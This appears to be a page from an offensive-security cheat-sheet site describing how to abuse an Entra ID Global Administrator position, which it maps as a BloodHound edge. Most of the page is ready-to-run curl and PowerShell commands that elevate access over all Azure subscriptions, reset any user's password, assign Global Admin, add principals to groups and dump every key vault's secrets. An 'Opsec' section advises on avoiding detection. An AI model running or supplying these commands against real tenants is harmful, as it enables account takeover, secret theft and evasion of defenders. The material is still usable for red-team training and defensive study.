🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZGlobalAdmin

AZGlobalAdmin

The source principal holds the Global Administrator role in Entra ID, granting full control over the tenant.

Applies to: User / ServicePrincipal β†’ AZTenant

Linux Abuse

Step 1 β€” Elevate to User Access Administrator over all subscriptions

# Must be done via REST β€” enables Azure resource management
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://management.azure.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X POST \
  "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Length: 0"

Step 2 β€” Reset any user's password

GRAPH_TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X PATCH "https://graph.microsoft.com/v1.0/users/<target-user-id>" \
  -H "Authorization: Bearer $GRAPH_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"passwordProfile": {"password": "<new-password>", "forceChangePasswordNextSignIn": false}}'

Assign Global Admin to any user

# Get role definition ID for Global Administrator
curl -s "https://graph.microsoft.com/v1.0/directoryRoles?\$filter=displayName eq 'Global Administrator'" \
  -H "Authorization: Bearer $GRAPH_TOKEN"

curl -s -X POST "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members/\$ref" \
  -H "Authorization: Bearer $GRAPH_TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

Elevate to User Access Administrator (PowerZure)

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Set-AzureElevatedPrivileges

Elevate via Az PowerShell

$uri = "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
Invoke-RestMethod -Method POST -Uri $uri -Headers @{Authorization = "Bearer <access-token>"}

Reset any user's password (Microsoft.Graph PowerShell)

Connect-MgGraph -AccessToken <access-token>
Update-MgUser -UserId <target-user-id> `
  -PasswordProfile @{Password = "<new-password>"; ForceChangePasswordNextSignIn = $false}

Assign Global Admin role to controlled user

$roleId = (Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'").Id
New-MgDirectoryRoleMember -DirectoryRoleId $roleId -DirectoryObjectId <object-id>

Add controlled SP to group (Microsoft.Graph PowerShell)

New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Read all key vault secrets after ARM elevation

Get-AzKeyVault | ForEach-Object {
  Set-AzKeyVaultAccessPolicy -VaultName $_.VaultName -ObjectId <object-id> -PermissionsToSecrets get,list
  Get-AzKeyVaultSecret -VaultName $_.VaultName
}

Opsec

  • ARM elevation ("elevateAccess") is logged and generates an alert in many SOC environments.
  • Password resets log in Entra ID audit with actor, target, and timestamp.
  • Role assignments log as "Add member to role" events.
  • Prefer assigning roles to a service principal (less visible) over an interactive user account.
  • Cloud Shell access from Global Admin context can be weaponized without additional tooling.